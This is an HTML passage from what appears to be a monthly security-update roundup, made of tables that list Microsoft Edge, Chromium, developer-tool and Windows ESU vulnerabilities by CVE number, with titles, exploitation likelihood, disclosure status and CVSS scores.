href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7971">CVE-2026-7971</a></td><td><p>Chromium: CVE-2026-7971 Inappropriate implementation in ORB</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7972">CVE-2026-7972</a></td><td><p>Chromium: CVE-2026-7972 Uninitialized Use in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7973">CVE-2026-7973</a></td><td><p>Chromium: CVE-2026-7973 Integer overflow in Dawn</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7974">CVE-2026-7974</a></td><td><p>Chromium: CVE-2026-7974 Use after free in Blink</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7975">CVE-2026-7975</a></td><td><p>Chromium: CVE-2026-7975 Use after free in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7976">CVE-2026-7976</a></td><td><p>Chromium: CVE-2026-7976 Use after free in Views</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7977">CVE-2026-7977</a></td><td><p>Chromium: CVE-2026-7977 Inappropriate implementation in Canvas</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7978">CVE-2026-7978</a></td><td><p>Chromium: CVE-2026-7978 Inappropriate implementation in Companion</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7979">CVE-2026-7979</a></td><td><p>Chromium: CVE-2026-7979 Inappropriate implementation in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7980">CVE-2026-7980</a></td><td><p>Chromium: CVE-2026-7980 Use after free in WebAudio</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7981">CVE-2026-7981</a></td><td><p>Chromium: CVE-2026-7981 Out of bounds read in Codecs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7982">CVE-2026-7982</a></td><td><p>Chromium: CVE-2026-7982 Uninitialized Use in WebCodecs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7983">CVE-2026-7983</a></td><td><p>Chromium: CVE-2026-7983 Out of bounds read in Dawn</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7984">CVE-2026-7984</a></td><td><p>Chromium: CVE-2026-7984 Use after free in ReadingMode</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7985">CVE-2026-7985</a></td><td><p>Chromium: CVE-2026-7985 Use after free in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7986">CVE-2026-7986</a></td><td><p>Chromium: CVE-2026-7986 Insufficient policy enforcement in Autofill</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7987">CVE-2026-7987</a></td><td><p>Chromium: CVE-2026-7987 Use after free in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7988">CVE-2026-7988</a></td><td><p>Chromium: CVE-2026-7988 Type Confusion in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7989">CVE-2026-7989</a></td><td><p>Chromium: CVE-2026-7989 Insufficient data validation in DataTransfer</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7990">CVE-2026-7990</a></td><td><p>Chromium: CVE-2026-7990 Insufficient validation of untrusted input in Updater</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7991">CVE-2026-7991</a></td><td><p>Chromium: CVE-2026-7991 Use after free in UI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7992">CVE-2026-7992</a></td><td><p>Chromium: CVE-2026-7992 Insufficient validation of untrusted input in UI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7994">CVE-2026-7994</a></td><td><p>Chromium: CVE-2026-7994 Inappropriate implementation in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7995">CVE-2026-7995</a></td><td><p>Chromium: CVE-2026-7995 Out of bounds read in AdFilter</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7996">CVE-2026-7996</a></td><td><p>Chromium: CVE-2026-7996 Insufficient validation of untrusted input in SSL</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7997">CVE-2026-7997</a></td><td><p>Chromium: CVE-2026-7997 Insufficient validation of untrusted input in Updater</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7998">CVE-2026-7998</a></td><td><p>Chromium: CVE-2026-7998 Insufficient validation of untrusted input in Dialog</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7999">CVE-2026-7999</a></td><td><p>Chromium: CVE-2026-7999 Inappropriate implementation in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8000">CVE-2026-8000</a></td><td><p>Chromium: CVE-2026-8000 Insufficient validation of untrusted input in ChromeDriver</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8001">CVE-2026-8001</a></td><td><p>Chromium: CVE-2026-8001 Use after free in Printing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8002">CVE-2026-8002</a></td><td><p>Chromium: CVE-2026-8002 Use after free in Audio</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8003">CVE-2026-8003</a></td><td><p>Chromium: CVE-2026-8003 Insufficient validation of untrusted input in TabGroups</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8004">CVE-2026-8004</a></td><td><p>Chromium: CVE-2026-8004 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8005">CVE-2026-8005</a></td><td><p>Chromium: CVE-2026-8005 Insufficient validation of untrusted input in Cast</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8006">CVE-2026-8006</a></td><td><p>Chromium: CVE-2026-8006 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8007">CVE-2026-8007</a></td><td><p>Chromium: CVE-2026-8007 Insufficient validation of untrusted input in Cast</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8008">CVE-2026-8008</a></td><td><p>Chromium: CVE-2026-8008 Inappropriate implementation in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8009">CVE-2026-8009</a></td><td><p>Chromium: CVE-2026-8009 Inappropriate implementation in Cast</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8010">CVE-2026-8010</a></td><td><p>Chromium: CVE-2026-8010 Insufficient validation of untrusted input in SiteIsolation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8011">CVE-2026-8011</a></td><td><p>Chromium: CVE-2026-8011 Insufficient policy enforcement in Search</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8012">CVE-2026-8012</a></td><td><p>Chromium: CVE-2026-8012 Inappropriate implementation in MHTML</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8013">CVE-2026-8013</a></td><td><p>Chromium: CVE-2026-8013 Insufficient validation of untrusted input in FedCM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8014">CVE-2026-8014</a></td><td><p>Chromium: CVE-2026-8014 Inappropriate implementation in Preload</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8015">CVE-2026-8015</a></td><td><p>Chromium: CVE-2026-8015 Inappropriate implementation in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8016">CVE-2026-8016</a></td><td><p>Chromium: CVE-2026-8016 Use after free in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8017">CVE-2026-8017</a></td><td><p>Chromium: CVE-2026-8017 Side-channel information leakage in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8018">CVE-2026-8018</a></td><td><p>Chromium: CVE-2026-8018 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8019">CVE-2026-8019</a></td><td><p>Chromium: CVE-2026-8019 Insufficient policy enforcement in WebApp</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8021">CVE-2026-8021</a></td><td><p>Chromium: CVE-2026-8021 Script injection in UI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8022">CVE-2026-8022</a></td><td><p>Chromium: CVE-2026-8022 Inappropriate implementation in MHTML</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33111">CVE-2026-33111</a></td><td><p>Copilot Chat (Microsoft Edge) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7896">CVE-2026-7896</a></td><td><p>Chromium: CVE-2026-7896 Integer overflow in Blink</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7897">CVE-2026-7897</a></td><td><p>Chromium: CVE-2026-7897 Use after free in Mobile</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7905">CVE-2026-7905</a></td><td><p>Chromium: CVE-2026-7905 Insufficient validation of untrusted input in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7912">CVE-2026-7912</a></td><td><p>Chromium: CVE-2026-7912 Integer overflow in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7913">CVE-2026-7913</a></td><td><p>Chromium: CVE-2026-7913 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7915">CVE-2026-7915</a></td><td><p>Chromium: CVE-2026-7915 Insufficient data validation in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7931">CVE-2026-7931</a></td><td><p>Chromium: CVE-2026-7931 Insufficient validation of untrusted input in iOS</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7941">CVE-2026-7941</a></td><td><p>Chromium: CVE-2026-7941 Insufficient validation of untrusted input in Mobile</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7993">CVE-2026-7993</a></td><td><p>Chromium: CVE-2026-7993 Insufficient validation of untrusted input in Payments</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8020">CVE-2026-8020</a></td><td><p>Chromium: CVE-2026-8020 Uninitialized Use in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42838">CVE-2026-42838</a></td><td><p>Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42891">CVE-2026-42891</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35429">CVE-2026-35429</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40416">CVE-2026-40416</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41107">CVE-2026-41107</a></td><td><p>Microsoft Edge (Chromium-based) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr></tbody></table><p></p><p></p><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42826">CVE-2026-42826</a></td><td><p>Azure DevOps Information Disclosure Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>10.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32175">CVE-2026-32175</a></td><td><p>.NET Core Tampering Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32177">CVE-2026-32177</a></td><td><p>.NET Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35433">CVE-2026-35433</a></td><td><p>.NET Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42899">CVE-2026-42899</a></td><td><p>ASP.NET Core Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41109">CVE-2026-41109</a></td><td><p>GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41094">CVE-2026-41094</a></td><td><p>Microsoft Data Formulator Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41613">CVE-2026-41613</a></td><td><p>Visual Studio Code Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41612">CVE-2026-41612</a></td><td><p>Visual Studio Code Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41611">CVE-2026-41611</a></td><td><p>Visual Studio Code Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41610">CVE-2026-41610</a></td><td><p>Visual Studio Code Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.3</p></td></tr></tbody></table><h3>ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54518">CVE-2025-54518</a></td><td><p>AMD: CVE-2025-54518 CPU OP Cache Corruption</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41095">CVE-2026-41095</a></td><td><p>Data Deduplication Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35424">CVE-2026-35424</a></td><td><p>Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40377">CVE-2026-40377</a></td><td><p>Microsoft Cryptographic Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34329">CVE-2026-34329</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41097">CVE-2026-41097</a></td><td><p>Secure Boot Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33839">CVE-2026-33839</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34330">CVE-2026-34330</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34331">CVE-2026-34331</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35423">CVE-2026-35423</a></td><td><p>Windows 11 Telnet Client Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34344">CVE-2026-34344</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34345">CVE-2026-34345</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35416">CVE-2026-35416</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41088">CVE-2026-41088</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34343">CVE-2026-34343</a></td><td><p>Windows Application Identity (AppID) Subsystem Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35418">CVE-2026-35418</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33835">CVE-2026-33835</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34337">CVE-2026-34337</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40407">CVE-2026-40407</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40397">CVE-2026-40397</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34336">CVE-2026-34336</a></td><td><p>Windows DWM Core Library Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33834">CVE-2026-33834</a></td><td><p>Windows Event Logging Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32209">CVE-2026-32209</a></td><td><p>Windows Filtering Platform (WFP) Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35421">CVE-2026-35421</a></td><td><p>Windows GDI Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40403">CVE-2026-40403</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33841">CVE-2026-33841</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35420">CVE-2026-35420</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34339">CVE-2026-34339</a></td><td><p>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34341">CVE-2026-34341</a></td><td><p>Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33838">CVE-2026-33838</a></td><td><p>Windows Message Queuing (MSMQ) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32161">CVE-2026-32161</a></td><td><p>Windows Native WiFi Miniport Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41089">CVE-2026-41089</a></td><td><p>Windows Netlogon Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34342">CVE-2026-34342</a></td><td><p>Windows Print Spooler Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34340">CVE-2026-34340</a></td><td><p>Windows Projected File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40398">CVE-2026-40398</a></td><td><p>Windows Remote 